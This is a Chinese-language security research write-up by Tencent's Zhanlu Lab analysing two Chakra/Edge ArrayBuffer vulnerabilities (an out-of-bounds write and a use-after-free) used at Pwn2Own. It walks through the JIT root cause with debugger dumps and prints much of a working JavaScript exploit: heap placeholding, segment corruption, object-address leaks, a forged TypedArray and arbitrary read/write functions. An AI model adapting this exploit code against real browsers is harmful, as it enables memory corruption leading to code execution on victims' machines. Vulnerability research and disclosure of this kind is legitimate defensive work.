来源:腾讯安全湛泸实验室
作者:腾讯安全湛泸实验室

​​0x00背景

今年3月结束的Pwn2own比赛中,湛泸实验室1秒内攻破史上最高难度的Edge浏览器,拿到首个单项最高分14分。此次比赛湛泸实验室准备了多个Edge漏洞和windows10内核提权漏洞,相关漏洞信息已经报告给微软。本文粗略介绍一下Pwn2Own比赛中湛泸实验室所用到的两个Edge漏洞,以及漏洞利用中的DVE(Data-Virtualization Execute)技术。这两个Edge漏洞我们实验室都完成了利用,在利用的细节上和之前IE上的cve-2014-6332有着异曲同工之妙。即DVE技术的基本思想:程序的一切皆是数据,通过修改程序的关键数据结构来控制程序执行,从而绕过所有Mitigation机制。下面笔者将较为细致地分析Pwn2own比赛的漏洞成因和利用过程,现在就开始Pwn2Own的旅程吧。Let’s go!!!!

0x01 漏洞简介

去年,湛泸实验室发现Chakra引擎中ArrayBuffer对象的两个神洞,一个越界访问(CVE:2017-0234)和一个释放后重用(CVE:2017-0236)。这两个漏洞的特殊之处在于漏洞的触发路径都在chakra引擎生成的jit 代码中。下面,笔者就和大家分享这两个漏洞的相关细节。

0x02漏洞成因

先看下面这段JS代码:

function write(begin,end,step,num)

{

 for(var i=begin;i<end;i+=step) view[i]=num;

}

var buffer =  new ArrayBuffer(0x10000);

var view   =  new Uint32Array(buffer);

write(0,0x4000,1,0x1234);

write(0x3000000e,0x40000010,0x10000,1851880825);  

其中,执行write(0,0x4000,1,0x1234)这句JS,会让chakra引擎针对write函数中的for循环生成Jit code。JIT生成的循环代码调用入口在chakra!Js::InterpreterStackFrame::DoLoopBodyStart,我们对这个函数下断,即可跟踪到write函数中for循环对应的Jit code。

​JIT经过一些列准备工作,最终来到JITLoop代码部分:

看一下JIT对这个for循环生成的汇编代码:

​代码稍微行数多一点,分开解释分析,for循环头部是获取for循环相关的参数

R12=0x0001000000010000  //这里是取出for循环的step=0x0001000000010000

R13=0x000100006e617579  //这里是取出view数组要赋予的值0x000100006e617579

R14=0x0001000040000010  //这里是取出for循环的end=0x0001000040000010

R15=0x000100003000000e  //这里是取出for循环的start=0x000100003000000e  

在这里可以发现每一个数值的高四位有一个1,是用来区分这个值是对象还是int类型的

1 表示数据int,0 表示obj

0:010>

rax=0000000000000001 rbx=00000186e9c00000 rcx=00000186e9800dc0

rdx=0000000000010000 rsi=00000186e95d68c4 rdi=00000036be1fb900

rip=00000187e9f00122 rsp=00000036be1fb5d0 rbp=00000036be1fb670

 r8=000000003000000e  r9=0000000040000010 r10=000100006e617579

r11=0000000000000001 r12=000100006e617579 r13=000100006e617579

r14=0001000040000010 r15=000100003000000e

iopl=0         nv up ei pl zr na po nc

cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246   

mov     dword ptr [rbx+r8*4],r12d ds:00000187`a9c00038=????????  

最终代码运行到此处,rbx是buffer对象的内存基地址,r8是数组索引0x3000000e,r12给数组赋予的值,整个过程没有检测索引的范围造成了数组越界。当然漏洞不仅仅这一个,仔细推敲上述过程,我们可以发现,JIT在使用buffer对象的缓冲区域时并没有检测buffer对象是否被分离释放,这就是我们发现的第二个漏洞。可能细心点的读者都发现了,写入的地址不可访问,都是?????????,那为什么漏洞会利用成功而且不崩溃呢?请看下文。

0x03 漏洞利用

只有crash是远远不够的,还记得yuange曾经说过:”exp的价值远远大于poc”。下面笔者将分析一下两个漏洞的利用技术,两个漏洞成因极为相似,所以在利用技术上也很相近。

触发UAF漏洞主要代码如下:

var buffer = new ArrayBuffer(0x10000);

var view = new Uint32Array(buffer);

var worker = new Worker('uaf1.js');

worker.postMessage(buffer,[buffer]);

worker.terminate();  

主要逻辑:

1)申请一个ArrayBuffer类型的数组变量buffer对象

2)紧接着新建Uint32Array类型的数组对象view,引用上面的buffer对象

3)通过调用postMessage(buffer,[buffer])和terminate()会将buffer对象申请的缓冲区内存彻底释放,这里是触发UAF的关键。work.postMessage移交buffer对象所有权, terminate()结束worker线程的时候会释放掉buffer这个对象原来申请的内存。

4)然而在类型数组view中却仍然保留着buffer对象申请的缓冲区内存的引用,并且引用时没有做检查,所以造成UAF 漏洞。.

越界代码因为ArrayBuffer对象申请4G虚拟空间,占位内存必须在ArrayBuffer的4G空间之后,这样两个漏洞利用就只有占位空间不一样,利用TypedArray写内存的索引不一样。UAF漏洞占位在原有buffer对象申请的缓冲区空间,OOB漏洞占位在其后4G空间。这样OOB漏洞写占位内存时,索引需要增加0x100000000/4=0x40000000,其它都相同。

1. 详细分析

我们来跟踪一下UAF的漏洞利用相关代码。 1)首先,申请一个ArrayBuffer类型的数组变量buffer,找到这个buffer变量,看一下内存结构

​rcx是ArrayBuffer对象,0x00000186-e9c00000是buffer对象申请的缓冲区内存,0x00000000-00010000 是buffer长度 ​下面是buffer的内存部分大小0x10000

​2)紧接着新建Uint32Array类型的变量view,引用上面的buffer,然后write(0,0x4000,1,0x1234); //大循环操作内存,让chakra引擎生成JIT代码 使用view对象操作ArraryBuffer的内存,看看被修改的buffer对象缓冲区这块内存,内存布局如下

​3)通过调用postMessage(buffer,[buffer])和terminate()会将buffer的缓冲区内存空间彻底释放。执行terminate之后释放了buffer对象的缓冲区内存,buffer指针被置空,长度值为0,(0x00000001-00000000实际代表长度为零)。

worker.postMessage(buffer,[buffer]);

worker.terminate();当worker调用postMessage的时候会发生Detach操作

​会调用 Js::ArrayBufferDetachedStateBase *__fastcall Js::ArrayBuffer::DetachAndGetState—> chakra!Js::ArrayBuffer::ClearParentsLength 把对象的长度清掉

​此时还没有清掉内存,后续函数会把内存释放掉。

4)然而在变量view 中却仍然保留着buffer对象缓冲区的引用,所以造成UAF 漏洞。下面内存是view对象的,此时View对buffer对象申请的缓冲区的引用仍然存在,也就是地址并没有清零

​此时我们看一下内存情况,buffer对象申请的缓冲区是不能被访问的

​已经被系统给回收了。 这样我们再占位这内存后,利用view对象去操作这块内存就造成了UAF漏洞。

2. 漏洞利用&Pwn

漏洞原因已经比较清晰了,but, How to Pwn?继续分析, 利用技术要点: 1)UAF漏洞在释放buffer对象的缓冲区后,紧接着通过分配Array 来占用已释放的缓冲区内存。OOB漏洞不需要前面的释放buffer对象缓冲区代码,最终占位的是缓冲区4G后的空间。
代码如下:

for(var i=0;i<0x1000;i+=1)

{

arr[i]=new Array(0x800);

arr[i][1]=25959;

arr[i][0]=0;

}

2)通过write向占位的arr写入标记,然后检测arr定位到占位成功的arr。OOB漏洞调用write写的时候,索引begin和end都需要加上0x40000000。

for(var i=0;i<0x1000;i+=1)

{

arr[i]=new Array(0x800);

arr[i][1]=25959;

arr[i][0]=0;

write(0x0e,0x00010,0x1000,1851880825);

if(arr[i][0]==1851880825)

{

1851880825 这个奇怪数值是什么呢?程序员看到这个数字大脑绝对是崩溃的,其实1851880825是”yuange”字符串中的”yuan”,25959是”yuange”中的”ge”,占位成功的话就拼接出”yuange”这个字符串。

​然后利用占位的数组,精心的构造一个对象,

​0x6e617579是标记,0x6567也是一个标记

//arr[i+1](arrvar) 的数据区紧邻arr[i](arrint)的数据区,都在释放了的buffer对象的缓冲区空间内

arr[i+1]=new Array(0x400);

arr[i+1][1]=buffer;

arr[i+1][0]=0;

getarrint(i);

}

}

函数getarrint 的定义如下:

function getarrint(i)

{

arr[i].length=0x10000;

arrint=arr[i];

arrvar=arr[i+1];

write(0x09,0x001000,0x100000,0x0001000);

write(0x0a,0x001000,0x100000,0x0001000);

}

//这里两个write修改占位成功的arrint 对象的segment 的size和length 字段

​下面可以看到已经成功修改了segment 的size和length字段 之前这个对象内存如下0x00000002 代表存储int的个数,从后面的内存可以看到,这里存储了0x6e617579和0x00006567两个值,0x6e617579是JIT代码写进来的,覆盖了arr[i][0]=0这个值。

​修改这个有什么作用呢?其实此时已经得到了一个长度为0x1000的seg, seg中元素个数为0x1000,此时就能越界对后面内存进行读写访问了。

​这个先放在这,后面要用到。下一步就是伪造一个fakeview,进而完成任意地址读写。

3)此时的内存布局如下:

Buffer--------> ---------------------------

| 0x20 内存块头部|

Arrint.seg--------->| |

| |

| |

| 0x3000 内存块|

| |

| |

Arrvar.seg———>| |

| |

| |

| |

| |

内存就是下面这样,注意连个地址之间相隔0x3020,中间是占位产生的数据

​arrint是NativeIntArray, 其seg的size为0x802,每个元素的长度为4byte,共为0x802*4+0x20+0x18=0x2040bytes长度,然后因为内存页对齐的原因为0x3000byte,所以中间空余了0x3000。此时我们可以通过arrint越界去读写arrvar的buffer部分了,这就已经完成对象地址的泄露了。

function getobjadd(myvar)

{

  arrvar[3]=myvar;

  uint32[0]=arrint[0xc06];

  return  arrint[0xc07]*0x100000000+uint32[0];    

}

4)紧接着通过调用fakeview 函数来伪造一个完全可控的TypedArray对象myview 实现任意地址读写。

var buffer1 = new ArrayBuffer(0x100);

var view1 = new Uint32Array(buffer1);

var view2 = new Uint32Array(buffer1);

var view3 = new Uint32Array(buffer1);

var view4 = new Uint32Array(buffer1);

function fakeview( )

{

arrint.length=0xffff0000; //arrint长度修改

​arrvar[0]=buffer1;

arrvar[1]=view2;

arrvar[2]=0;

//修改arrint 的segment.next 指向view2+0x28

write(0x00000d,0x001000,0x100000,arrint[0xc03]);

write(0x00000c,0x001000,0x100000,arrint[0xc02]+0x28);
​View+0x28位置是存放的buffer1对象的地址: ​使用arrint[0xc00]越界就可以获取到buffer1对象地址0x186-e96a5300低4字节。 uint32[0]=arrint[0xc00];

index=uint32[0];

//中间使用unit32[0]是用来做符号转换的,index就是buffer1对象的地址低4字节。因为seg.next指向view2+0x28,view2+0x28的值为buffer1,所以下一个seg的seg.left就是buffer1的低4字节,这个段的索引号就是从index开始。

Seg的头长度0x18,后面接的是具体数组数据,这样0x28+0x18=0x40,view2对象的长度是0x40,这时候seg的数组数据区域就刚好指向下一个view对象0x186`e9800dc0,可能是紧挨着的view1或者view3。

//通过越界读复制view1或者view3 对象的0x40字节到view4 的buff 区域

for(var i=0;i<0x10;i++) view4[i]=arrint[index+i];

//恢复segment.next

write(0x0d,0x0001000,0x100000,0);

write(0x0c,0x0001000,0x100000,0);

View4对象内存如下,View4的buffer地址为0x17e-e425ae40,现在这个已经是我们伪造出来的myview的结构体部分

​myview 的内存布局如下:

arrint[0xc04]=view4[0x0e];

arrint[0xc05]=view4[0x0f];

// view4[0xe]和view4[0x0f]对应的就是view4引用的buffer1对象的数据缓冲区,也就是伪造的myview对象的地址,取出来保存到arrvar[2]位置。这样就把伪造的view对象通过arrvar[2]做对象引出,可以JS直接引用。

myview=arrvar[2];

}

得到了需要的伪造的TypedArray对象myview,整个对象结构体在view4里,可以通过view4去修改。myview 的内存布局如下:

myview是Uint32Array对象,结构体中存了一个64位数组数据缓冲区指针,我们已经具备了修改这个对象结构的能力,那么我们可以通过修改这个指针,通过类型数组做到任意地址读写。

5)此时myview 便伪造成功,由于myview 整个都在view4 的buff 空间中,所以view4 可以对myview 进行任意读写,而此时myview 也被edge 识别为Uint32Array 对象类型。即可实现任意读写,代码如下:

function readuint32(address)

{

view4[0x0e]=address%0x100000000;

view4[0x0f]=address/0x100000000;

return myview[0];

}

function writeuint32(address,num)

{

view4[0x0e]=address%0x100000000;

view4[0x0f]=address/0x100000000;

myview[0]=num;

}

加上前面已经实现的任意对象地址读取

function getobjadd(myvar)

{

  arrvar[3]=myvar;

  uint32[0]=arrint[0xc06];

  return  arrint[0xc07]*0x100000000+uint32[0];    

}

这样可以获取任意我们需要的对象地址,然后读写和修改对象数据,继续bypass各种利用缓解措施,得到代码执行能力等,从这里开始就获得了和上帝一样的能力。

0x04漏洞攻击(Fire Now!!!)

攻击效果就是百发百中,指哪打哪。

0x05 漏洞精华

笔者才疏学浅,深知自己不能完全领会漏洞利用的全部,但是也总结一下调试过程中发现漏洞利用精华和奇妙的地方,

1) 这个漏洞在没有占位成功的时候,向已经释放的内存中写入数据并不会导致程序崩溃,这就大大的增加了漏洞利用程序的稳定性。

​调试的时候,发现这个buffer在没有完成占位的情况下,对buffer的写入操作并不会崩溃,这个异常会被edge自己处理掉,不会导致崩溃发生,这样就会让exploit程序非常的稳定。也是非常感叹这是两个非常好用的神洞啊。也就是文中前面留下的那个神秘问题。

2) 漏洞利用精髓自然是DVE方法精确的数据控制能力,通过漏洞的内存修改能力,修改arrint对象的seg的数据结构,然后arrint和arrvar互相配合实现类型混淆,可以对对象任意读写伪造,这和cve-2014-6332的DVE利用代码的两个数组交错修改具有异曲同工之秒。完成任意地址读写,然后通过修改对象数据,打开“上帝模式”。

0xFF总结

通过上述分析,笔者逐渐领悟到DVE技术的精髓:通过修改关键数据结构来获取任意数据操纵的能力,这就是袁哥所说的“上帝之手”。然后借”上帝之手”绕过dep+alsr+cfg+rfg等漏洞防御技术,最后配合内核漏洞,完成整个Exploit Chain的攻击。感谢分析过程中yuange的指导和实验室小伙伴的帮助,笔者能力有限,分析有误的地方还望大家指出。最后,欢迎对二进制漏洞研究感兴趣的小伙伴加入腾讯湛泸实验室,发送简历到yuangeyuan@tencent.com。

部分关键利用代码:

for(var i=0;i<0x1000;i+=1)

{

   arr[i]=new Array(0x800);

   arr[i][1]=25959;

   arr[i][0]=0;

   write(0x0e,0x00010,0x1000,1851880825);

   if(arr[i][0]==1851880825)

   {      

      arr[i+1]=new Array(0x400);

      arr[i+1][1]=buffer;

      arr[i+1][0]=0;

      getarrint(i);

      fakeview();

      document.write("<br><br> find i="+i+"<br>");

      bypassdepcfg();

      break;

   }

}

function getarrint(i)

{  

  arr[i].length=0x10000;

  arrint=arr[i];  

  arrvar=arr[i+1];

  write(0x09,0x001000,0x100000,0x0001000);

  write(0x0a,0x001000,0x100000,0x0001000);

}

function fakeview( )

{

  arrint.length=0xffff0000;  

  arrvar[0]=buffer1;

  arrvar[1]=view2;

  arrvar[2]=0;

  write(0x0d,0x001000,0x100000,arrint[0xc03]);

  write(0x0c,0x001000,0x100000,arrint[0xc02]+0x28);    

  uint32[0]=arrint[0xc00];

  index=uint32[0];

  for(var i=0;i<0x10;i++) view4[i]=arrint[index+i];

  write(0x0d,0x0001000,0x100000,0);

  write(0x0c,0x0001000,0x100000,0);   

  arrint[0xc04]=view4[0x0e];

  arrint[0xc05]=view4[0x0f];

  myview=arrvar[2];

}

​​​​